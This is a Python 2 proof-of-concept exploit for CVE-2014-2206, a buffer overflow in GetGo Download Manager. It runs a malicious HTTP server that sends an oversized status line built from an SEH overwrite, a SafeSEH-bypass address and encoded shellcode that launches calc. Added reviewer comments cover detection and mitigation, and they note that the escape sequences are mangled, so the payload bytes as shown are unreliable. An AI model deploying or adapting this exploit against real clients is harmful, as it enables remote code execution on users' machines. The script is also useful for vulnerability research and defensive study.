
GetGo Download Manager 4.9.0.1982 Buffer Overflow

Posted on 11 March 2014

#!/usr/bin/python
# Exploit Title: GetGo Download Manager HTTP Response Header Buffer Overflow Remote Code Execution
# Version: v4.9.0.1982
# CVE: CVE-2014-2206
# Date: 2014-03-09
# Author: Julien Ahrens (@MrTuxracer)
# Homepage: http://www.rcesecurity.com
# Software Link: http://www.getgosoft.com
# Tested on: WinXP SP3-GER
#
# Howto / Notes:
# SEH overwrite was taken from outside of loaded modules, because all modules are SafeSEH-enabled
#
# Reviewer notes (defensive reading of this proof of concept):
#   - Direction of attack: the script is a *server*. It listens on host:port,
#     waits for the vulnerable client (the download manager) to connect, and
#     replies with an oversized HTTP status line. The overflow therefore occurs
#     on the client side when it parses the response header (per the title).
#     Any exposure requires the client to fetch from a server the attacker
#     controls (or a man-in-the-middle position).
#   - Detection: an HTTP status line / response header several KB long, sent
#     by a server that answers every request with the same "200" line, is the
#     observable artefact on the wire. Client-side, an SEH-chain exception in
#     the download manager process shortly after an HTTP response is received.
#   - Mitigation: do not run the affected version (4.9.0.1982 per the header);
#     upgrade to a vendor build that addresses CVE-2014-2206, and keep DEP /
#     SEHOP enabled on the host — the header note says the SEH handler address
#     was chosen outside SafeSEH-protected modules, so SafeSEH alone did not
#     stop it.
#   - Fidelity: this is Python 2 (print statements, str-as-bytes). The escape
#     sequences in the string literals below appear mangled by page extraction
#     ("x90" rather than a one-byte escape), so the literals as shown are
#     plain ASCII text and the stated sizes do not match the author's intent.

from socket import *
from time import sleep
from struct import pack

# Address and port the fake HTTP server binds to; the victim client must be
# pointed at this endpoint. Constructed sample value, not a real target.
host = "192.168.0.1"
port = 80

# Plain blocking TCP listener: accept exactly one client connection.
s = socket(AF_INET, SOCK_STREAM)
s.bind((host, port))
s.listen(1)
print " [+] Listening on %d ..." % port
cl, addr = s.accept()
print "[+] Connection accepted from %s" % addr[0]

# Payload layout (per the variable names: classic SEH-overwrite pattern):
#   junk0  -> filler up to the SEH record
#   nseh   -> next-SEH field (short jump per the comment convention; not
#             verifiable here since the escapes are mangled)
#   seh    -> handler pointer; the comment says it resolves to
#             "call dword ptr ss:[ebp+30]" and lies outside any module,
#             which is why SafeSEH does not reject it
#   nops   -> slide into the encoded payload
junk0 = "x90" * 4107
nseh = "x90x90xEBx06"
seh=pack('<L',0x00280b0b) # call dword ptr ss:[ebp+30] [SafeSEH Bypass]
nops = "x90" * 50

# windows/exec CMD=calc.exe
# Encoder: x86/shikata_ga_nai
# powered by Metasploit
# msfpayload windows/exec CMD=calc.exe R | msfencode -b 'x00x0ax0d'
# Per the comments above: a benign proof-of-concept payload (launches calc)
# generated by Metasploit and encoded to avoid the listed bad characters.
# The encoder name and bad-char list are taken from the comment, not
# verified from the bytes.
shellcode = ("xdaxcaxbbxfdx11xa3xaexd9x74x24xf4x5ax31xc9" +
"xb1x33x31x5ax17x83xc2x04x03xa7x02x41x5bxab" +
"xcdx0cxa4x53x0ex6fx2cxb6x3fxbdx4axb3x12x71" +
"x18x91x9exfax4cx01x14x8ex58x26x9dx25xbfx09" +
"x1ex88x7fxc5xdcx8ax03x17x31x6dx3dxd8x44x6c" +
"x7ax04xa6x3cxd3x43x15xd1x50x11xa6xd0xb6x1e" +
"x96xaaxb3xe0x63x01xbdx30xdbx1exf5xa8x57x78" +
"x26xc9xb4x9ax1ax80xb1x69xe8x13x10xa0x11x22" +
"x5cx6fx2cx8bx51x71x68x2bx8ax04x82x48x37x1f" +
"x51x33xe3xaax44x93x60x0cxadx22xa4xcbx26x28" +
"x01x9fx61x2cx94x4cx1ax48x1dx73xcdxd9x65x50" +
"xc9x82x3exf9x48x6ex90x06x8axd6x4dxa3xc0xf4" +
"x9axd5x8ax92x5dx57xb1xdbx5ex67xbax4bx37x56" +
"x31x04x40x67x90x61xbex2dxb9xc3x57xe8x2bx56" +
"x3ax0bx86x94x43x88x23x64xb0x90x41x61xfcx16" +
"xb9x1bx6dxf3xbdx88x8exd6xddx4fx1dxbax0fxea" +
"xa5x59x50")

# The whole payload is embedded in the HTTP status line after "200": the
# client overflows while handling this header field. The line terminator
# that would normally end the status line is not visible in this copy
# (presumably lost with the other escapes).
payload = junk0 + nseh + seh + nops + shellcode
buffer = "HTTP/1.1 200 "+payload+" "

# Echo the client's request, answer with the crafted response, then close.
# The sleep gives the client time to consume the response before the
# socket is torn down.
print cl.recv(1000)
cl.send(buffer)
print "[+] Sending buffer: OK "
sleep(3)
cl.close()
s.close()

 
